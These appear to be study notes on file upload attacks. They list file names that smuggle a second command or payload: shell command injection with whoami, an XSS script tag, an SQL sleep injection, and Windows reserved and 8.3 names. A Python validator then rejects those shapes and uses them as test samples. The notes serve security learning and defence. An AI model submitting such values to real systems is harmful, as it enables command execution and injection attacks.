Other Upload Attacks

RCE in File Name

file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami

XSS in File Name

<script>alert(window.origin);</script>.jpg

SQL Injection in File Name

file';select+sleep(5);--.jpg

Windows Specific Attacks

|, <, >, *, or ?

CON, COM1, LPT1, or NUL

8.3_filename -> I think this is the short name on the IIS server
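A server-side check that rejects the file name shapes listed above, added here as an example and not part of the original notes. The image-only extension policy, the character allowlist, and the names check_upload_name and stored_name are assumptions of this sketch.

```python
import re
import secrets

# Assumed policy for this sketch: image uploads only.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Conservative allowlist: letters, digits, dot, underscore, hyphen.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,100}")
# Device names Windows reserves regardless of extension (CON, NUL, COM1, LPT1, ...).
RESERVED = re.compile(r"(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])(\..*)?", re.IGNORECASE)
# 8.3 short-name form such as UPLOAD~1.JPG.
SHORT_NAME = re.compile(r"~\d")


def check_upload_name(name: str) -> list[str]:
    """Return the reasons a client-supplied file name is rejected (empty = accepted)."""
    problems = []
    if not SAFE_NAME.fullmatch(name):
        problems.append("characters outside allowlist")
    if RESERVED.fullmatch(name):
        problems.append("reserved Windows device name")
    if SHORT_NAME.search(name):
        problems.append("8.3 short-name pattern")
    if name.startswith(".") or name.endswith((".", " ")):
        problems.append("leading dot or trailing dot/space")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXTENSIONS:
        problems.append("extension not allowed")
    return problems


def stored_name(name: str) -> str:
    """Name used on disk: random, server-generated; only the vetted extension is kept."""
    if check_upload_name(name):
        raise ValueError("rejected upload name")
    ext = name.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs, taken from the file name shapes listed above.
SAMPLES = [
    "file$(whoami).jpg", "file`whoami`.jpg", "file.jpg||whoami",
    "<script>alert(window.origin);</script>.jpg",
    "file';select+sleep(5);--.jpg", "CON", "COM1.jpg", "UPLOAD~1.JPG",
    "holiday-photo_01.jpg",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", check_upload_name(s) or "ok")
```

Because the stored name is generated on the server, the client-supplied string never reaches a shell, a SQL statement, or the file system; if it is shown in a page or saved in a database, it still needs output encoding and parameterized queries.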

Advanced File Upload Attacks

Things like XXE in ffmpeg
